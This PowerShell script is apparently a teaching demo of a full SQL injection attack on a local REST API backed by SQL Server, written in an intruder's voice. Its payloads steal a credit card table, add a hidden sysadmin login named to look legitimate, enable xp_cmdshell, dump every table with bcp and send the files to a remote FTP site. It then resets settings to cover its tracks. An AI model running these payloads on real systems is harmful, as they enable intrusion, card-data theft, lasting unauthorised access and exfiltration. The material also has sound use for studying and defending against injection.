﻿cls
$VerbosePreference = 'Continue'
$server='' #this gets filled in for you
$database=''#this gets filled in for you
$minDelay=0 #minimum delay 
$maxDelay=0.1 #maximum delay 
$ThebaseURI='http://localhost:8081'
$ThePathTheServer='DataBackups'
$TheDriveOnTheServer='C:%5C' #The backslash must be 'escaped'

<# See Mimikatz, Metasploit, PowerSploit, Empire, LSADump Invoke-TokenManipulation for 
methods of getting passwords via local or domain admin
for escalation see if the user has securitydmin, and see if the id_trustworthy settings are on.#> 

<# ok. We first check the procedure call- make sure it works as expected. #>
Write-Host  -ForegroundColor 'yellow' "... I'm testing $ThebaseURI/AdventureProc, running it properly. Parameter 12"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventureproc/12')
} Catch { write-warning $_}
<# it sees to work. Let's check to see if this is properly parameterised. by adding an expression #>
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
Write-Host  -ForegroundColor 'yellow' "... and again testing the procedure now appending a SELECT statement"
Try {
    Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventureproc/12; select 1');
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#'Error converting data type nvarchar to int'. That means that there was no client validation.
That was caught within the stored procedure. That's a shame, but it shows a weakness in the
way that parameterization was done. had the parameter of the procedure been a string, there would be
a small chance of an injection exploit. But it wasn't. The main plus point is that detailed errors
are returned to the client. I've never understood why. Fine for development though, and glorious
for the intruder #>
#Let's check the query instead.
Write-Host  -ForegroundColor 'yellow' "... I'm testing the query on $ThebaseURI/Adventure, running it properly. Parameter 1"
Try { Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/1')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# OK we get a response that is valid. It works. Check with another value #>
Write-Host  -ForegroundColor 'yellow' "... I'm testing the query, running it properly. Parameter 25"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/25')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# that worked. Is there any obvious checking of parameters? #>
Write-Host  -ForegroundColor 'yellow' "... I'm checking to see if the query is parameterised"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/silly')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#"Invalid column name 'silly'." Wow. a lovely clear error. This is a gift.  There is 
no checking of the datatype of the parameter. 
The error shows that the incorrect parameter was passed to the database. 
This is promising because that parameter 'silly' wasn't checked as a number
and it was executed as Select xxx from yyy where ccc = silly. We could use it to find out
the names of all the columns but life is too short and we don't want to draw attention to
the exploit by making lots of errors. Can we execute code? #>
Write-Host  -ForegroundColor 'yellow' "... I'm Seeing whether SQL Server attempts to execute the second query"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/4;select silly')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# Incorrect syntax near ';' - it wasn't expecting the termination of the query. This is the
sort of error you get if you miss out a bracket. It must be a closing ')' missing #>
Write-Host  -ForegroundColor 'yellow' "... I'm trying an alternative to get it to execute the second query"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/4);select silly')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#"Incorrect syntax near ';'.". Maybe I was wrong. However, even if I was right I'd expect this
because I didn't comment out the final ')' which would have been inserted after the parameter.
let's add a line comment and see,#>
Write-Host  -ForegroundColor 'yellow' "... I forgot to comment-out the trailing bracket"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/4);select silly --')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# we are airborne. it has tried to  execute the code we injected.
Will it return more than one result?#>
Write-Host  -ForegroundColor 'yellow' "... Will the interface return more than one one result?"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/4);select 'first';Select 'second' --"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# No. We are stuck with just one result but we can still use the 'UNION' trick. More of that
later. Firstly, we will just try to modify the where clause in the SQL query. Can we use this 
to get the whole table?
To do this we need to add to the WHERE filter so that every line is TRUE so the whole table 
is returned. This is normally used for getting all the encrypted passwords from a website.
These can be 'brute-forced' offsite where there isn't any logging#>
Write-Host  -ForegroundColor 'yellow' "... I want to get the entire table rather than one row"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/1 or 1=1')|format-table
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#no worries. We now have the whole table. What else is there that can be seen by this login?
We now need to get other information back. 
To do this,just lets make sure we can do the UNION trick #> 
Write-Host  -ForegroundColor 'yellow' "... Now I'm Seeing whether the UNION trick works"
Try {Invoke-RestMethod -Method 'Get' -Uri ($ThebaseURI + '/adventure/1)
     union all Select null, null, null, null, null, null, null --')
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#This may look pretty useless but if we match the datatypes of the first query in the union then
we can pass back anything we like. Let's try that string. Let's get the server and database name#>
Write-Host  -ForegroundColor 'yellow' "... I'm injecting useful information into a returned string column"
Try {$database=(Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) 
union all Select null, null, null, null,db_name(), null, null --").GetEnumerator()|
foreach {$_.AccountNumber}
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
Try {$server=(Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) 
union all Select null, null, null, null, @@Servername, null, null --").GetEnumerator()|
foreach {$_.AccountNumber}
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#Those integers seem promising but there is not much we can
use the GUID column for so we'll assign a null. 
The date is a blessing whenever we want a date such as an expiry date
of a credit card. That string is a gift, and it is going to have to do
a lot of work #>
<# before we execute some code to get a table result, lets see what type
of user connection we have,using a select statement.
For escalation, it is nice to see if the user has securitydmin. If so, 
we can promote this to sysadmin. 
#>
Write-Host  -ForegroundColor 'yellow' "... Get the basic information about the login assigned to the REST interface"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) 
  union select IS_SRVROLEMEMBER('diskadmin', system_user) , 
               IS_SRVROLEMEMBER('securityadmin', system_user), 
               IS_SRVROLEMEMBER('sysadmin', system_user), 
               IS_SRVROLEMEMBER('serveradmin', system_user),
               'server '+@@ServerName+'-'+system_user+' '+current_user,null,null
  union select IS_MEMBER('db_owner') , 
               IS_MEMBER('db_securityadmin'), 
               IS_MEMBER('db_accessadmin'), 
               IS_MEMBER('db_ddladmin'),
               'Database ='+db_name()+' '+system_user+' '+current_user,null,null
               -- "
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# OOOH! We're a sysadmin!!! The UNION trick works. Basically, game over.
we have the name of the server and database an the identity and roles of our user
Notice that we prevented any results coming back from the original table by making the
filter ALWAYS return false #>

<# We got back those two extra rows. Can we use the UNION trick to get to the system tables? #>
Write-Host  -ForegroundColor 'yellow' "... checking whether we can easily access the system tables"
Try {(Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2)
   union 
     select 1,principal_id,schema_id,
     object_id,object_schema_name(object_id)+'.'+name,
     null,modify_date from sys.tables --").GetEnumerator() |
 select @{Name="Object_id"; Expression = {$_.TerritoryID}},
        @{Name="Table"; Expression = {$_.AccountNumber}},
        @{Name="Modify_date"; Expression = {$_.ModifiedDate}},
        @{Name="Schema_id"; Expression = {$_.StoreID}},
        @{Name="Principal_id"; Expression = {$_.PersonID}}|
         format-table
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#  this went well. 
    Anything that looks like credit cards? (notice that we have to 'escape' the
    wildcard '%' character in the LIKE filter) #>
Write-Host  -ForegroundColor 'yellow' "... Using the system tablews to search for sensitive columns"
Try {(Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2 )
   union 
    select 
      column_id,system_type_id,max_length,object_id,
      Object_Schema_Name(object_id)+ '.'+Object_Name(object_id)+ '.'+ name,
      null,null
    FROM sys.columns 
      WHERE name LIKE '%25card%25' 
        OR Object_Name(object_id) LIKE '%25card%25'--").GetEnumerator() |
 select @{Name="Object_id"; Expression = {$_.TerritoryID}},
        @{Name="column"; Expression = {$_.AccountNumber}},
        @{Name="System_Type_id"; Expression = {$_.PersonID}},
        @{Name="Max_Length"; Expression = {$_.StoreID}},
        @{Name="Column_id"; Expression = {$_.customerID}}|
         format-table
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# That sales.creditcard table looks promising. Ideally, we can pull out this 
credit card table straight through the interface without the need for a payload.
This is possible here! Normally, the attacker has to splice the table from 
several select statements but here we are lucky.#>
Write-Host  -ForegroundColor 'yellow' "... stealing the credit card table"
Try {(Invoke-RestMethod -Method 'Get' -Uri "
    http://localhost:8081/adventure/1 and 1=2) 
    union select 
           creditcardid,expmonth,expyear,1,'('+cardtype+') '
           +cardnumber,null,modifiedDate 
           FROM sales.creditcard --").GetEnumerator() |
 select @{Name="Provider and card"; Expression = {$_.AccountNumber}},
        @{Name="ExpiryMonth"; Expression = {$_.PersonID}},
        @{Name="ExpiryYear"; Expression = {$_.StoreID}},
        @{Name="CreditCard_id"; Expression = {$_.customerID}}|
         format-table
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# now it would be nice to have our own sysadmin login to get in.
Let's check to see if we are in mixed mode #>
Write-Host  -ForegroundColor 'yellow' "... find out whether we can create a new user"
Try {(Invoke-RestMethod -Method 'Get' -Uri "
    http://localhost:8081/adventure/1 and 1=2) 
    union all Select null, null, null, null,
    CASE SERVERPROPERTY('IsIntegratedSecurityOnly') 
       WHEN 0 THEN 'Mixed Authentication' 
       WHEN 1 THEN 'Windows Authentication' 
    END, null, null --").GetEnumerator() |
select @{Name="Authentication mode"; Expression = {$_.AccountNumber}}
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep

<# it is simpler and more useful for the hacker to do a password login
so let's do it that way. We'll give it a name that looks like an
intended name on first glance #>
Write-Host  -ForegroundColor 'yellow' "... Create our own SQL Server sysadmin login"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
    CREATE LOGIN MSSecurityMtr WITH PASSWORD = 'DtctTn2L2TXqfuqb';
    EXEC master..sp_addsrvrolemember @loginame = N'MSSecurityMtr', @rolename = N'sysadmin' --"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# And we can now check that it is there #>
Write-Host  -ForegroundColor 'yellow' "... Check whether our new sysadmin login works"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
EXECUTE AS LOGIN='MSSecurityMtr'--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<#good. No error. If we can see the server on the network, we probably now have complete
control of this machine #>
<# And we can now check that it is there #>
Write-Host  -ForegroundColor 'yellow' "... Can we use it to copy a table out. Check OpenRowSet"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) union all
SELECT * FROM OPENROWSET(
  'SQLOLEDB', 
  'Server=$server;uid=MSSecurityMtr;pwd=DtctTn2L2TXqfuqb', 
  'select null, null, null, null, null,
  ''3F5AE95E-B87D-4AED-95B4-C3797AFCB74F'', ''2014-09-12T11:15:07.263Z''
  ')--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of component 'Ad Hoc 
Distributed Queries' because this component is turned off as part of 
the security configuration for this server. A system administrator can enable the use of
'Ad Hoc Distributed Queries' by using sp_configure. For more information about enabling 'Ad Hoc 
Distributed Queries', search for 'Ad Hoc Distributed Queries' in SQL Server Books Online.

So we change the configuration for ad hoc distributred queries, just briefly. #>
Write-Host  -ForegroundColor 'yellow' "... See if we can change the configuration"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
use $database
execute sp_configure 'show advanced options',1;
reconfigure with override;
execute sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure with override;
--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# now it works #>
Write-Host  -ForegroundColor 'yellow' "... Recheck whether the OpenRowSet works works with $database"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) union all
SELECT * FROM OPENROWSET(
  'SQLOLEDB', 
  'Server=$server;uid=MSSecurityMtr;pwd=DtctTn2L2TXqfuqb', 
  'select null, null, null, null, null,
  ''3F5AE95E-B87D-4AED-95B4-C3797AFCB74F'', ''2014-09-12T11:15:07.263Z''
  ')--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# we can now keep control of this server even if the DBA spots that the user assigned has
 too many permissions. We can also log in directly via SSMS if the server is on the same network
 Now we want to copy out all the data from this database and send it offline. to do this
 we will need to have xp_cmdshell working. I've already set config for ad hoc queries so
 we know we can do it for XP_cmdshell.#>
Write-Host  -ForegroundColor 'yellow' "... Now let's open up xp_cmdshell on $server"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
use $database
execute sp_configure 'show advanced options',1;
reconfigure with override;
execute sp_configure 'xp_cmdshell', 1;  
reconfigure with override;
--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# The first
 thing is to get a place to save the data. For this we'll need to do DOS commands such
 as DIR and FTP. We can, of course, run PowerShell unless that is tied down, but that 
 is an extra complication. First a directory listing....
 #>
Write-Host  -ForegroundColor 'yellow' "... Can we get a directory listing back? We want to look around"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
DECLARE @directoryListing TABLE (TheORDER int identity,  theLine NVARCHAR(255));
INSERT INTO @directoryListing(theLine) EXECUTE  xp_cmdshell 'dir'
SELECT NULL,NULL,NULL,NULL,TheLine,NULL,NULL FROM @directoryListing
--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# nothing gets returned because we couldn't UNION, but that pause told us it worked
if you get an error, fix the config like we did for ad-hoc queries  
We'll need to do this in two calls. The first gathers the deata into a table and the
second returns the result to the client. For this we need a table. While we experiment,
we'll just do a simple DIR command to look at the current directory just so we can be sure
of getting data back
#>
<# Can we create a temporary table? #>
Write-Host  -ForegroundColor 'yellow' "... Try to use a temporary table to get directory listings  back"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
create table #directoryListing (TheORDER int identity,  theLine NVARCHAR(255));
INSERT INTO #directoryListing(theLine) EXECUTE  xp_cmdshell 'dir'; --"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# This gives an error but it isn't server-side #>

<# Ah the Hash sign wasn't escaped. So let's now create the temp table. #>
Write-Host  -ForegroundColor 'yellow' "... Retry to use a temporary table to get directory listings  back using escape"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
create table %23directoryListing (TheORDER int identity,  theLine NVARCHAR(255));
INSERT INTO %23directoryListing(theLine) EXECUTE  xp_cmdshell 'dir';
--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# ok so far. The pause showed us that the table was filled.
 Now let's scoop up the result and we'll be laughing #>
Write-Host  -ForegroundColor 'yellow' "... now try to read back the contents of the temp table"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) union all 
SELECT NULL,NULL,NULL,NULL,TheLine,NULL,NULL FROM %23directoryListing--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# "Invalid object name '#directoryListing'.". Oh bother, they've implemented
connection pooling at the client end. We'll have to create a permanent table instead
#>

<# So let's look around the server, using a permanent table. 
We need to find a place to dump the contents of all the tables so we can then FTP them 
off the site. 
Let's hope they haven't got SQL Monitor and Phil's excellent add-in. Just so there is
less 'noise', we'll stack up our commands What we are doing now is in the root of drive C,
what network connections are set up, and what drives are available.
Network connections are set up by DBAs and often contain backups, which are ripe plums 
for the intruder. It is always worth checking if you are a villain #>

Write-Host  -ForegroundColor 'yellow' "... Right. We have to use a permanent table to get a file listing"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
create table MS_Temp267 (TheORDER int identity,  theLine NVARCHAR(255));
INSERT INTO MS_Temp267(theLine) EXECUTE  xp_cmdshell 'dir c:%5C';
INSERT INTO MS_Temp267(theLine) EXECUTE  xp_cmdshell 'net use';
INSERT INTO MS_Temp267(theLine) EXECUTE  xp_cmdshell 'wmic logicaldisk list brief'--;
"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# now we have the table, we can find it the next time we connect to the server 
and do our union trick to return the information. Let's make it look neat. #>
 
Write-Host  -ForegroundColor 'yellow' "... now read back the contents of the temp table"
Try {(Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2) union all 
SELECT NULL,NULL,NULL,NULL,TheLine,NULL,NULL FROM MS_Temp267;drop table MS_Temp267--").GetEnumerator() |
 select  @{Name="Table"; Expression = {$_.AccountNumber}}|
         format-table
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# note that we dropped that table smartly so it doesn't appear in the metadata any more #>

<# in our case there are no network connections which is a bit diappointing, but 
we console ourselves with the fact that there is a drive D which would take a payload.#>

$TheDirectoryOnTheServer=$TheDriveOnTheServer+$ThePathTheServer
Write-Host  -ForegroundColor 'yellow' "... create a directory to take the dumped data of $server.$database"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
EXECUTE  xp_cmdshell 'md $TheDirectoryOnTheServer'--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# we create a directory that looks beyond suspicion #>
<# now we backup the data in all the tables into that directory, using the login 
that we created #>
Write-Host  -ForegroundColor 'yellow' "... dump the entire database in a directory"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
EXEC sp_msforeachtable 'xp_cmdshell ''bcp  %3F  out  $TheDirectoryOnTheServer%5C%3F.data -n -N -d$database -UMSSecurityMtr -PDtctTn2L2TXqfuqb -S$server'';'--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# that we created #>
Write-Host  -ForegroundColor 'yellow' "... Now ship the payload of $database.$server out to our remote FTP site"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
Execute xp_cmdshell 'echo open $FTPLocation%3E$TheDirectoryOnTheServer%5Coutput.txt';
Execute xp_cmdshell 'echo $FTPUserID%3E%3E$TheDirectoryOnTheServer%5Coutput.txt';
Execute xp_cmdshell 'echo $FTPPassword%3E%3E$TheDirectoryOnTheServer%5Coutput.txt';
Execute xp_cmdshell 'echo prompt%3E%3E$TheDirectoryOnTheServer%5Coutput.txt';
Execute xp_cmdshell 'echo cd $ftpDirectory%3E%3E$TheDirectoryOnTheServer%5Coutput.txt';
Execute xp_cmdshell 'echo mput $TheDirectoryOnTheServer%5C* %3E%3E$TheDirectoryOnTheServer%5Coutput.txt';
Execute xp_cmdshell 'ftp -s:$TheDirectoryOnTheServer%5Coutput.txt'--"
} Catch { write-warning $_}
Get-Random -Minimum $minDelay -Maximum $maxDelay|start-sleep
<# Let's cover our tracks a bit by resetting config and deleting a directory #>
Write-Host  -ForegroundColor 'yellow' "... Now let's tear-down and cover our tracks"
Try {Invoke-RestMethod -Method 'Get' -Uri "$ThebaseURI/adventure/1 and 1=2);
use $database
EXEC sp_configure @configname='hadoop connectivity';  
execute sp_configure 'show advanced options',1;
reconfigure with override;
Execute xp_cmdshell 'del $TheDirectoryOnTheServer%5C*.* %2FQ'
Execute xp_cmdshell 'rmdir $TheDirectoryOnTheServer'
execute sp_configure 'Ad Hoc Distributed Queries',0;
execute sp_configure 'xp_cmdshell', 0;  
reconfigure with override;
--"
} Catch { write-warning $_}


<# well, now we know how to do it, shall we try it in PowerShell now?. Perhaps
 another day. #>
